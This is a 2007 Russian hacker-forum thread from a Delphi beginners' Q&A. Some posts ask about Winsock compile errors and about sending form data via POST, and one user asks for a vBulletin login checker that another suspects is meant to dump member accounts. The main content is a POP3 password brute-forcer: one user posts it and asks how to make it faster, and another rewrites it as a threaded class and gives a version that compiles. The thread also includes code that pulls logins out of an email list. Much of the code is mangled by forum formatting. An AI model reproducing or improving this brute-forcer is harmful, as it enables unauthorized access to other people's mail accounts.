[ Delphi / Pascal ] — начинающим: задаем вопросы (архивная - 2015)

Discussion in 'С/С++, C#, Rust, Swift, Go, Java, Perl, Ruby' started by banned, 6 May 2007.

Thread Status:
Not open for further replies.
  1. infernal-team

    infernal-team Elder - Старейшина

    Joined:
    4 Jul 2007
    Messages:
    53
    Likes Received:
    17
    Reputations:
    -10
    [Error] Unit1.pas(68): Undeclared identifier: 'TWSAData'
    [Error] Unit1.pas(69): Undeclared identifier: 'TSockAddrIn'
    [Error] Unit1.pas(70): Undeclared identifier: 'TSocket'
    [Error] Unit1.pas(80): Undeclared identifier: 'send'
    [Error] Unit1.pas(80): Undeclared identifier: 'SOCKET_ERROR'
    [Warning] Unit1.pas(80): Comparing signed and unsigned types - widened both operands
    [Error] Unit1.pas(89): Undeclared identifier: 'recv'
    [Error] Unit1.pas(90): Undeclared identifier: 'SOCKET_ERROR'
    [Error] Unit1.pas(97): Undeclared identifier: 'WSAStartUp'
    [Error] Unit1.pas(98): Undeclared identifier: 'socket'
    [Error] Unit1.pas(98): Undeclared identifier: 'SOCK_STREAM'
    [Error] Unit1.pas(98): Undeclared identifier: 'IPPROTO_IP'
    [Error] Unit1.pas(99): Undeclared identifier: 'INVALID_SOCKET'
    [Warning] Unit1.pas(99): Comparing signed and unsigned types - widened both operands
    [Error] Unit1.pas(103): Undeclared identifier: 'inet_addr'
    [Error] Unit1.pas(107): Missing operator or semicolon
    [Error] Unit1.pas(108): Missing operator or semicolon
    [Error] Unit1.pas(108): Undeclared identifier: 'htons'
    [Error] Unit1.pas(109): Missing operator or semicolon
    [Error] Unit1.pas(112): Undeclared identifier: 'connect'
    [Warning] Unit1.pas(112): Comparing signed and unsigned types - widened both operands
    [Error] Unit1.pas(150): Undeclared identifier: 'closesocket'
    [Error] Unit1.pas(151): Undeclared identifier: 'WSACleanup'
    [Fatal Error] Project1.dpr(8): Could not compile used unit 'Unit1.pas'

    В чем проблема?
     
  2. LEE_ROY

    LEE_ROY Elder - Старейшина

    Joined:
    9 Nov 2006
    Messages:
    450
    Likes Received:
    188
    Reputations:
    26
    мда, а че сложного то? у тебя ситуцация такая, что словами нихрена неопишеш а кодить несложно, просто время займет. а за просто так, никто такой херней заниматся небудет, пиши в работу.
     
    1 person likes this.
  3. infernal-team

    infernal-team Elder - Старейшина

    Joined:
    4 Jul 2007
    Messages:
    53
    Likes Received:
    17
    Reputations:
    -10
    Да какая работа тут дела на 5-10 минут, только я не очень селен в делпхи. Пробывал код с mail agenta (фейк чет не получилось).
     
  4. ZirroCool

    ZirroCool Elder - Старейшина

    Joined:
    16 Sep 2006
    Messages:
    128
    Likes Received:
    55
    Reputations:
    20
    квэшн

    Всем привет!
    Вот есть код
    Code:
    <body>
    Загруженость сервиса: 0 %
    
    	  <TABLE width="200" cellpadding="0" cellspacing="0" height="7">
    
    	   <TR>
    	     <TD align="center" bgcolor="#CC5555" width=0%>
    	     </TD>
    	     <TD align="center" bgcolor="#888888" width=200%>
    	     </TD>
    	   </TR>
    	  </table><br>
    
        <div align=center><table cellspacing=0  border=0 cellpadding=0 width=650>
          <tr>
            <td style="padding:0px; margin: 0px; width: 100%; border: 1px solid #ffffff; height:68px;background-image: url('fon.png')"><img src="logo.png" alt=""></td>
            </tr>
        </table></div><br>
         <div  align=center><table cellspacing=0  border=0 cellpadding=3 width=650>
          <tr valign=top>
            <td width=300 style="vertical-align:middle;" bgcolor=white><a href="http://www.adv.lala.org/"><img border=0 src="reklama_loader.gif" alt=""></a></td>
            <td bgcolor=#444444 class="panel"><b>Отправка файла на E-mail</b><br><br><br>		<div align=center>
            Размер файла не должен превышать <b>100 MB</b><br><br>
    	Файл разбивается на части если его размер больше <b>10 MB</b><br><br>
            <form action="index.php" method="post"  ENCTYPE='multipart/form-data'>
            <div align=left>url (путь к файлу с <b>протоколом</b>):<br>
            <input name="usrurl" type=text value=""><br>
            e-mail (адрес доставки):<br>
            <input name="mail" type=text value=""></div><br>
            <img src="captcha/index.php"><br>
            Введите символы указаные на картинке:<br>
            <input type="text" style="width:100px;" name="simbols"><br><br><br>
            <input style="width:100px;" type=submit value="Отправить">
            </form></div>
            <br></td>
          </tr>
        </table></div><br><br>
        <div align=center><a href="http://www.lala.org/"></a><br>Copyright © 2006-2007<br><img src="http://www.lala.org/count/counter.php" border=0></div>
      </body>
    
    Ну здесь как видно есть 3 поля и кнопка отправки данных!
    Надеюсь что вы мне расскажите как можно отправить эти данные без захода на страничку,тобеж я делаю программу клиент, но в пост запросах ничего не понимаю!Будьте добры покажите как нужно сделать!
    Желательно привести часть кода где при нажатии на кнопку инфа береться из эдитов и передается на сервер!Заранее большое спасибо!
    зы.как я понял это нитак сложно,просто я никогда с этим не сталкивался а разобраться сам никак не могу,уже кучу инфы пересмотрел никак не вьеду!
    Есче раз спасибо!
     
    #504 ZirroCool, 18 Aug 2007
    Last edited: 18 Aug 2007
  5. NetMan

    NetMan Elder - Старейшина

    Joined:
    9 Feb 2004
    Messages:
    121
    Likes Received:
    37
    Reputations:
    34
    ZirroCool > Посмотри как выглядит этот POST-запрос при помощи какого-нибудь HTTP-сниффера.
     
  6. ZirroCool

    ZirroCool Elder - Старейшина

    Joined:
    16 Sep 2006
    Messages:
    128
    Likes Received:
    55
    Reputations:
    20
    раз уж на то пошло там был ZeroCool!
    NetMan,на счет снифера,я никогда им не пользовался!
    так что по возможности кодом!
     
  7. LEE_ROY

    LEE_ROY Elder - Старейшина

    Joined:
    9 Nov 2006
    Messages:
    450
    Likes Received:
    188
    Reputations:
    26
    зирокул
    непользовался? так начни пользоваться, со снифа снял пост, впихнул в стринг и через сокет отправил.
     
  8. xaker-boss

    xaker-boss Elder - Старейшина

    Joined:
    6 Mar 2007
    Messages:
    251
    Likes Received:
    49
    Reputations:
    -11
    Люди как залогиница на сйте(vBulletin)?
    [​IMG]
    Кто может сделать такое, и чтобы если он залогинился то выходила ошибка типа вы вошли как(Edit1)
    а если не залогинился выдавал типа неверные данные.
    Кому нетрудно сделайте плиз
    ну к примеру можно взять античат а я потом потправлю.
    Если можете выложити исходник
     
    #508 xaker-boss, 18 Aug 2007
    Last edited: 18 Aug 2007
  9. W!z@rD

    W!z@rD Борец за русский язык

    Joined:
    12 Feb 2006
    Messages:
    973
    Likes Received:
    289
    Reputations:
    43
    infernal-team
    необходимо подключить модули:
    PHP:
    uses windowswinsock;
    xaker-boss
    ога всю мембер-базу ачата решил слить?
    я не понимаю... ты просишь такие вещи за которые платят =/... было бы такое в нете "за так", творился бы беспорядок... и для новичка замахнулся ты слишком =/

    ZirroCool
    эээ ответ есть...
    CGI-приложения... - вот твой ответ =/
     
    #509 W!z@rD, 19 Aug 2007
    Last edited: 19 Aug 2007
  10. xaker-boss

    xaker-boss Elder - Старейшина

    Joined:
    6 Mar 2007
    Messages:
    251
    Likes Received:
    49
    Reputations:
    -11
    Nightmarе да я искал но так и ненашол
     
  11. alamat

    alamat Elder - Старейшина

    Joined:
    6 Aug 2007
    Messages:
    18
    Likes Received:
    3
    Reputations:
    0
    Здравствуйте! Есть вот такой код, как я могу величить скорость преберирания паролей? Потоки? Как?
    Code:
    unit Unit2;
    
    interface
    
    uses
      Windows, Messages, SysUtils, Variants, Classes, Graphics, Controls, Forms,
      Dialogs, ExtCtrls, StdCtrls, Sockets, IdBaseComponent;
    
    type
      threed = class(TThread)
      private
        { Private declarations }
      protected
        procedure Execute; override;
      end;
    
    implementation
    
    { Important: Methods and properties of objects in visual components can only be
      used in a method called using Synchronize, for example,
    
          Synchronize(UpdateCaption);
    
      and UpdateCaption could look like,
    
        procedure threed.UpdateCaption;
        begin
          Form1.Caption := 'Updated in a thread';
        end; }
    
    { threed }
    uses unit1;
    procedure threed.Execute;
    var
    LoginStrings:TStrings;
    PassStrings:TStrings;
    i,j:integer;
    begin
    LoginStrings:=TStringList.Create;
    PassStrings:=TStringList.Create;
    //Çàãðóæàåì âàðèàíòû — ñïðàâî÷íèêè èìåí è ïàðîëåé
    LoginStrings.LoadFromFile(form1.Edit3.Text);
    PassStrings.LoadFromFile(form1.Edit4.Text);
    form1.IdPOP31.Host:=form1.Edit1.Text;
    form1.IdPOP31.Port:=strtoint(form1.Edit2.Text);
    for i:=0 to LoginStrings.Count-1 do
    for j:=0 to PassStrings.Count-1 do
    begin
    form1.IdPOP31.UserName:=LoginStrings.Strings[i];
    form1.IdPOP31.Password:=PassStrings.Strings[j];
    form1.Memo2.Lines.Add(LoginStrings.Strings[i]+';'+PassStrings.Strings[j]);
    //Ïîïûòêà ñîåäèíåíèÿ.
    try
    form1.IdPOP31.Connect;
    except
    end;
    if form1.IdPOP31.Connected then
    begin
    form1.Memo1.Lines.Add(LoginStrings.Strings[i]+';'+PassStrings.Strings[j]);
    form1.IdPOP31.Disconnect;
    end;
    form1.IdPOP31.Disconnect;
    end;
    end;
    end.



    Второй вопрос:
    Допустим есть файл email.txt
    там хранятся данные типа:
    sdas@mail.ru
    asdas@bk.ru
    asdas@info.ru и т.д.
    так вот задача отрезать все личнее допустим от @mail.ru и записать это в отдельный файл
     
  12. PandoraBox

    PandoraBox Elder - Старейшина

    Joined:
    6 May 2007
    Messages:
    262
    Likes Received:
    176
    Reputations:
    7
    Code:
    var
     StringList: TStringList;
     LoginList: TextFile;
     Email, I: Integer;
     MLogin{, MServer}: String;
    begin
     StringList := TStringList.Create; // Создаем лист
     StringList.LoadFromFile('C:\email.txt'); // Загружаем лист
     AssignFile(LoginList, 'C:\LoginList.txt'); // Создаем файл
     ReWrite(LoginList); // Даем права на запись
     for I := 0 to (StringList.Count - 1) do
     begin
      Application.ProcessMessages; // шоб не зависло
      Email := Pos('@', StringList.Strings[i]); // Находим '@'
      MLogin := Copy(StringList.Strings[i], 1, Email - 1); // Вытягиваем логин
      //MServer := Copy(StringList.Strings[i], Email{ + 1}, Length(StringList.Strings[i])); // Вытягиваем сервер
      //Записываем вытянутые данные
      //ListBox1.Items.Add(MLogin); // Добовляем в список логин
      //ListBox2.Items.Add(MServer); // Добовляем в список сервер
      WriteLn(LoginList, MLogin); // Записываем логин(ы)
     end;
      CloseFile(LoginList); // Закрываем дескриптор
      StringList.Free; // Удаляем лист
     
    #512 PandoraBox, 21 Aug 2007
    Last edited: 21 Aug 2007
  13. W!z@rD

    W!z@rD Борец за русский язык

    Joined:
    12 Feb 2006
    Messages:
    973
    Likes Received:
    289
    Reputations:
    43
    PHP:
    unit Unit2;

    interface

    uses
      SysUtils
    ClassesSocketsIdBaseComponent;

    type
      threed 
    = class(TThread)
      private
        { Private 
    declarations }
        
    LLTStringList;
        
    PLTStringList;
        
    tmpIInteger;
        
    tmpJInteger;
        
    IdPOP3TIdPOP3;
        
    procedure CallBack;
      protected
        
    constructor Create(LoginListstringPassListstringaHoststringaPortWord);
        
    destructor Destroy;
        
    procedure Executeoverride;
      
    end;

    implementation

    uses unit1
    ;

    constructor threed.Create(LoginListstringPassListstringaHoststringaPortWord);
    begin
    LL
    :=TStringList.Create;
    LP:=TStringList.Create;
    LL.LoadFromFile(LoginList);
    LP.LoadFromFile(PassList);
    IdPOP3:=TIdPOP3.Create;
    with IdPOP3 do
    begin
        Host
    :=aHost;
        
    Port:=aPort;
    end;
    inherited Create(false);
    end;

    procedure threed.CallBack;
    begin
    form1
    .Memo2.Lines.Add(LL.Strings[tmpI]+';'+PS.StringstmpJ]);
    end;

    destructor threed.Destroy;
    begin
    LL
    .Free;
    LP.Free;
    IdPOP3.Free;
    end;

    procedure threed.Execute;
    var
    i,j:integer;
    begin
    for i:=0 to LS.Count-do
    for 
    j:=0 to LP.Count-do
    begin
    IdPOP3
    .UserName:=LS.Strings[i];
    IdPOP3.Password:=LP.Strings[j];
    try
    IdPOP3.Connect;
    except
    end
    ;
    if 
    IdPOP3.Connected then
    begin
    Synchronize
    (CallBack);
    IdPOP3.Disconnect;
    end;
    IdPOP3.Disconnect;
    end;
    end;
    end.
    Пример использования

    PHP:
    threed.Create('c:\logins.txt''c:\pass.txt''Host HERE'25);
    P.S. никакой многопоточности Я не увидел (по крайней мере в твоем коде) =/...
    P.S.S. должно работать не проверял, писал в Опере :D
    P.S.S.S. не забываем освобождать ресурсы системы =/

    лишнее или личное?
    З.Ы. личное резать не хорошо =/

    PHP:
    procedure CRASH_INTERNET;
    var 
    iInteger;
    sstring;
    aTStringList;
    bTStringList;
    begin
    a
    :=TStringList.Create;
    b:=TStringList.Create;
    try
        for 
    i:=0 to a.Count do
        
    begin
            s
    :=a.Strings[i];
            if 
    pos('@'s) > 0 then b.Add(copy(s0pos('@'s) - 1);
        
    end;
    finally
    b.SaveToFile('c:\result.txt');
    a.Free;
    b.Free;
    end;
    P.S. написанно так же в Опере
    P.S.S. не забываем освобождать ресурсы системы =/
     
  14. alamat

    alamat Elder - Старейшина

    Joined:
    6 Aug 2007
    Messages:
    18
    Likes Received:
    3
    Reputations:
    0
    Да мне нужно чтобы быстро работала прога, а она подбирает медленно, 1,5 сек 1 пароль
     
  15. W!z@rD

    W!z@rD Борец за русский язык

    Joined:
    12 Feb 2006
    Messages:
    973
    Likes Received:
    289
    Reputations:
    43
    а ты мой пример пробовал??!?!!
     
  16. alamat

    alamat Elder - Старейшина

    Joined:
    6 Aug 2007
    Messages:
    18
    Likes Received:
    3
    Reputations:
    0
    Да, там где то ошибка
     
  17. W!z@rD

    W!z@rD Борец за русский язык

    Joined:
    12 Feb 2006
    Messages:
    973
    Likes Received:
    289
    Reputations:
    43
    >Да, там где то ошибка
    именно где?!?

    >Nightmarе
    если у них есть вебформа для отправки ICQ вообщения, то можно...
     
  18. alamat

    alamat Elder - Старейшина

    Joined:
    6 Aug 2007
    Messages:
    18
    Likes Received:
    3
    Reputations:
    0
    Build
    [Error] Unit2.pas(16): Undeclared identifier: 'TIdPOP3'
    [Warning] Unit2.pas(20): Method 'Destroy' hides virtual method of base type 'TThread'
    [Error] Unit2.pas(31): Undeclared identifier: 'LP'
    [Error] Unit2.pas(33): Missing operator or semicolon
    [Error] Unit2.pas(34): Missing operator or semicolon
    [Error] Unit2.pas(37): Undeclared identifier: 'Host'
    [Error] Unit2.pas(38): Undeclared identifier: 'Port'
    [Error] Unit2.pas(45): Undeclared identifier: 'PS'
    [Error] Unit2.pas(45): 'END' expected but ']' found
    [Error] Unit2.pas(51): Undeclared identifier: 'LP'
    [Error] Unit2.pas(52): Missing operator or semicolon
    [Error] Unit2.pas(59): Undeclared identifier: 'LS'
    [Error] Unit2.pas(60): Undeclared identifier: 'LP'
    [Error] Unit2.pas(62): Missing operator or semicolon
    [Error] Unit2.pas(62): Missing operator or semicolon
    [Error] Unit2.pas(63): Missing operator or semicolon
    [Error] Unit2.pas(63): Missing operator or semicolon
    [Error] Unit2.pas(65): Missing operator or semicolon
    [Error] Unit2.pas(68): 'THEN' expected but identifier 'Connected' found
    [Error] Unit2.pas(71): Missing operator or semicolon
    [Error] Unit2.pas(73): Missing operator or semicolon
    [Hint] Unit2.pas(13): Private symbol 'PL' declared but never used
    [Hint] Unit2.pas(15): Private symbol 'tmpJ' declared but never used
    [Fatal Error] Project1.dpr(5): Could not compile used unit 'Unit2.pas'
     
  19. W!z@rD

    W!z@rD Борец за русский язык

    Joined:
    12 Feb 2006
    Messages:
    973
    Likes Received:
    289
    Reputations:
    43
    PHP:
    unit Unit2;

    interface 

    uses 
      Classes
    IdPOP3;

    type 
      threed 
    = class(TThread
      private 
        { Private 
    declarations 
        
    LLTStringList
        
    PLTStringList
        
    tmpIInteger
        
    tmpJInteger
        
    IdPOP3TIdPOP3;
        
    procedure CallBack;
      protected
        
    constructor Create(LoginListstringPassListstringaHoststringaPortWord);
        
    procedure Executeoverride;
      public
          
    destructor Destroyoverride;
      
    end;

    implementation 

    uses unit1


    constructor threed.Create(LoginListstringPassListstringaHoststringaPortWord);
    begin
    LL
    :=TStringList.Create;
    PL:=TStringList.Create;
    LL.LoadFromFile(LoginList); 
    PL.LoadFromFile(PassList);
    IdPOP3:=TIdPOP3.Create(nil);
    with IdPOP3 do 
    begin 
        Host
    :=aHost
        
    Port:=aPort
    end
    inherited Create(false); 
    end

    procedure threed.CallBack
    begin 
    form1
    .Memo2.Lines.Add(LL.Strings[tmpI]+';'+PL.Strings[tmpJ]);
    end

    destructor threed.Destroy
    begin 
    LL
    .Free
    PL.Free;
    IdPOP3.Free
    end

    procedure threed.Execute;
    var 
    i,j:integer
    begin 
    for i:=0 to LL.Count-do
    for 
    j:=0 to PL.Count-do
    begin 
    IdPOP3
    .UserName:=LL.Strings[i];
    IdPOP3.Password:=PL.Strings[j];
    try 
    IdPOP3.Connect
    except 
    end

    if 
    IdPOP3.Connected then 
    begin 
    Synchronize
    (CallBack); 
    IdPOP3.Disconnect
    end
    IdPOP3.Disconnect
    end
    end
    end.
    все откомпилировалось...
     
  20. alamat

    alamat Elder - Старейшина

    Joined:
    6 Aug 2007
    Messages:
    18
    Likes Received:
    3
    Reputations:
    0
    Да откомпилировалось) но не работает))))
     
Loading...
Thread Status:
Not open for further replies.